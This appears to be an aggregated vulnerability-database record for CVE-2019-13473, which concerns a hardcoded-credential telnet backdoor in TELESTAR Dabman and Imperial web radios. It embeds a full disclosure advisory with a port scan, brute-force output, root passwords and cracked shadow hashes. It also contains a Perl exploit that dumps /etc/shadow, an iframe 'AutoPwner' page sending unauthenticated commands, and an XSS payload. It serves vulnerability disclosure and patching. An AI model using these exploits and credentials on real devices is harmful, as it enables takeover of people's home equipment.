ID

VAR-201909-1007


CVE

CVE-2019-13473


TITLE

plural TELESTAR Vulnerability in using hard-coded credentials in product

Trust: 0.8

sources: JVNDB: JVNDB-2019-009388

DESCRIPTION

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have an undocumented TELNET service within the BusyBox subsystem, leading to root access. plural TELESTAR The product contains a vulnerability involving the use of hard-coded credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Dabman & Imperial Web Radio Devices is a radio device. Dabman & Imperial Web Radio Devices has an authentication bypass vulnerability that allows an attacker to bypass the authentication mechanism and gain unauthorized access. This could lead to further attacks. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. Document Title: =============== Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor & Command Execution Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2183 Video: https://www.vulnerability-lab.com/get_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.4 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 5.000€ - 10.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2018-06-01: Researcher Notification & Coordination (Security Researcher) 2018-06-02: Vendor Notification (Telestar Digital Data Security Department) 2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2018-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |_ Supported Methods: GET |_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NCrack [telnetd] (ncrack -v --user root [IP]:[PORT]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217_M8_TFT_7601_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh_frame.init_array. fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : [ [[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: [, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit <html> <head><body> <title>Dabman & Imerpial - HTML AutoPwner</title> <iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe> <iframe src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe> <iframe src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe> <iframe src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe> </body></head> <html> PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com . It uses the firmware UIProto, different versions of which can also be found in many other radios. The firmware offers a rudimentary web API that can be reached on the local network on port 80. This API is completely unauthenticated, allowing anyone to control the radio over the local network. (already known as CVE-2019-13474, but relevant for the other two findings) [1] [2] [3] 2. The web UI does not encode user input, resulting in a XSS vulnerability, e.g. The firmware crashes when sending a device name longer than 84 characters. Some parts of the firmware will recover afterwards and music will play again after a few seconds, but the service on port 80 remains borked until the radio is reset using the switch on the back. This may or may not be a memory corruption vulnerability. I don't feel like analyzing this any further, but it certainly looks kinda fucked. These reports also mention other devices that are possibly affected by this as well. Also, if anyone knows how to re-enable telnetd on the patched version of UIProto, please let me know! Love, naphthalin [1] https://github.com/kayrus/iradio [2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio [3] https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

Trust: 2.52

sources: NVD: CVE-2019-13473 // JVNDB: JVNDB-2019-009388 // CNVD: CNVD-2019-33602 // VULHUB: VHN-145323 // VULMON: CVE-2019-13473 // PACKETSTORM: 154416 // PACKETSTORM: 174503

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-33602

AFFECTED PRODUCTS

vendor:telestarmodel:imperial i110scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i200-cdscope:eqversion: -

Trust: 1.0

vendor:telestarmodel:bobs rock radioscope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i200scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i150scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:dabman d10scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i450scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i400scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i600scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:imperial i500-btscope:eqversion: -

Trust: 1.0

vendor:aunamodel:connect 100scope:eqversion: -

Trust: 1.0

vendor:telestarmodel:dabman i30 stereoscope:eqversion: -

Trust: 1.0

vendor:telestarmodel:bobs rock radioscope: - version: -

Trust: 0.8

vendor:telestarmodel:dabman d10scope: - version: -

Trust: 0.8

vendor:telestarmodel:dabman i30 stereoscope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i110scope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i150scope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i200scope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i200-cdscope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i400scope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i450scope: - version: -

Trust: 0.8

vendor:telestarmodel:imperial i500-btscope: - version: -

Trust: 0.8

vendor:telestarmodel:dabman & imperial web radio devicesscope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2019-33602 // JVNDB: JVNDB-2019-009388 // NVD: CVE-2019-13473

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-13473
value: CRITICAL

Trust: 1.0

NVD: CVE-2019-13473
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2019-33602
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201909-342
value: CRITICAL

Trust: 0.6

VULHUB: VHN-145323
value: HIGH

Trust: 0.1

VULMON: CVE-2019-13473
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2019-13473
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2019-33602
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-145323
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-13473
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2019-13473
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2019-33602 // VULHUB: VHN-145323 // VULMON: CVE-2019-13473 // JVNDB: JVNDB-2019-009388 // CNNVD: CNNVD-201909-342 // NVD: CVE-2019-13473

PROBLEMTYPE DATA

problemtype:CWE-798

Trust: 1.9

sources: VULHUB: VHN-145323 // JVNDB: JVNDB-2019-009388 // NVD: CVE-2019-13473

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201909-342

TYPE

trust management problem

Trust: 0.6

sources: CNNVD: CNNVD-201909-342

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-009388

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-145323

PATCH

title:Top Pageurl:https://telestar.de/

Trust: 0.8

title:Patch for Dabman & Imperial Web Radio Devices command execution vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/182779

Trust: 0.6

title:CVEurl:https://github.com/grymer/CVE

Trust: 0.1

sources: CNVD: CNVD-2019-33602 // VULMON: CVE-2019-13473 // JVNDB: JVNDB-2019-009388

EXTERNAL IDS

db:NVDid:CVE-2019-13473

Trust: 3.4

db:PACKETSTORMid:154416

Trust: 1.9

db:PACKETSTORMid:174503

Trust: 1.2

db:JVNDBid:JVNDB-2019-009388

Trust: 0.8

db:CNNVDid:CNNVD-201909-342

Trust: 0.7

db:CNVDid:CNVD-2019-33602

Trust: 0.6

db:VULHUBid:VHN-145323

Trust: 0.1

db:VULMONid:CVE-2019-13473

Trust: 0.1

sources: CNVD: CNVD-2019-33602 // VULHUB: VHN-145323 // VULMON: CVE-2019-13473 // JVNDB: JVNDB-2019-009388 // PACKETSTORM: 154416 // PACKETSTORM: 174503 // CNNVD: CNNVD-201909-342 // NVD: CVE-2019-13473

REFERENCES

url:https://www.vulnerability-lab.com/get_content.php?id=2183

Trust: 2.7

url:http://packetstormsecurity.com/files/154416/dabman-and-imperial-web-radio-devices-undocumented-telnet-backdoor.html

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-13473

Trust: 1.6

url:http://seclists.org/fulldisclosure/2023/sep/1

Trust: 1.1

url:http://packetstormsecurity.com/files/174503/internet-radio-auna-ir-160-se-uiproto-dos-xss-missing-authentication.html

Trust: 1.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13473

Trust: 0.8

url:https://seclists.org/fulldisclosure/2019/sep/12

Trust: 0.7

url:https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

Trust: 0.2

url:https://cwe.mitre.org/data/definitions/798.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Trust: 0.1

url:https://www.vulnerability-lab.com/show.php?user=benjamin+k.m.

Trust: 0.1

url:http://93.234.141.215:80/back

Trust: 0.1

url:http://93.234.141.215:80/irdevice.xml

Trust: 0.1

url:http://93.234.141.215:80/set_dname?name=pwnd

Trust: 0.1

url:http://93.234.141.215:80/exit

Trust: 0.1

url:http://93.234.141.215:80

Trust: 0.1

url:http://93.234.141.215:80/playinfo

Trust: 0.1

url:http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/stream.wav&name=name></iframe>

Trust: 0.1

url:http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>

Trust: 0.1

url:https://www.xing.com/companies/telestar-digitalgmbh

Trust: 0.1

url:https://www.vulnerability-lab.com/get_content.php?id=2190

Trust: 0.1

url:https://www.vuln-lab.com

Trust: 0.1

url:http://93.234.141.215:80/set_dname?name=pwnd></iframe>

Trust: 0.1

url:http://93.234.141.215:8080

Trust: 0.1

url:http://93.234.141.215:80/sendkey?key=3

Trust: 0.1

url:http://ncrack.org

Trust: 0.1

url:http://93.234.141.215:80/setvol?vol=10&mute=0

Trust: 0.1

url:http://93.234.141.215:80/stop

Trust: 0.1

url:http://93.234.141.215:80/hotkeylist

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2019-13474

Trust: 0.1

url:http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>

Trust: 0.1

url:http://93.234.141.215:80:8080/playlogo.jpg

Trust: 0.1

url:http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/msg.wav&save=1

Trust: 0.1

url:http://93.234.141.215:80/init?language=us

Trust: 0.1

url:http://93.234.141.215:80/';

Trust: 0.1

url:http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/stream.wav&name=name

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2019-13473

Trust: 0.1

url:http://192.168.178.93/set_dname?name=><script>alert(1)</script>

Trust: 0.1

url:https://github.com/kayrus/iradio

Trust: 0.1

url:https://sites.google.com/site/tweakradje/devices/abeo-internet-radio

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-13474

Trust: 0.1

sources: CNVD: CNVD-2019-33602 // VULHUB: VHN-145323 // VULMON: CVE-2019-13473 // JVNDB: JVNDB-2019-009388 // PACKETSTORM: 154416 // PACKETSTORM: 174503 // CNNVD: CNNVD-201909-342 // NVD: CVE-2019-13473

CREDITS

Benjamin Kunz Mejri

Trust: 0.7

sources: PACKETSTORM: 154416 // CNNVD: CNNVD-201909-342

SOURCES

db:CNVDid:CNVD-2019-33602
db:VULHUBid:VHN-145323
db:VULMONid:CVE-2019-13473
db:JVNDBid:JVNDB-2019-009388
db:PACKETSTORMid:154416
db:PACKETSTORMid:174503
db:CNNVDid:CNNVD-201909-342
db:NVDid:CVE-2019-13473

LAST UPDATE DATE

2024-08-14T14:19:22.692000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2019-33602date:2019-09-29T00:00:00
db:VULHUBid:VHN-145323date:2020-08-27T00:00:00
db:VULMONid:CVE-2019-13473date:2023-09-05T00:00:00
db:JVNDBid:JVNDB-2019-009388date:2019-09-19T00:00:00
db:CNNVDid:CNNVD-201909-342date:2020-08-28T00:00:00
db:NVDid:CVE-2019-13473date:2023-09-05T17:15:07.477

SOURCES RELEASE DATE

db:CNVDid:CNVD-2019-33602date:2019-09-29T00:00:00
db:VULHUBid:VHN-145323date:2019-09-11T00:00:00
db:VULMONid:CVE-2019-13473date:2019-09-11T00:00:00
db:JVNDBid:JVNDB-2019-009388date:2019-09-19T00:00:00
db:PACKETSTORMid:154416date:2019-09-09T20:22:22
db:PACKETSTORMid:174503date:2023-09-05T14:43:51
db:CNNVDid:CNNVD-201909-342date:2019-09-09T00:00:00
db:NVDid:CVE-2019-13473date:2019-09-11T19:15:11.593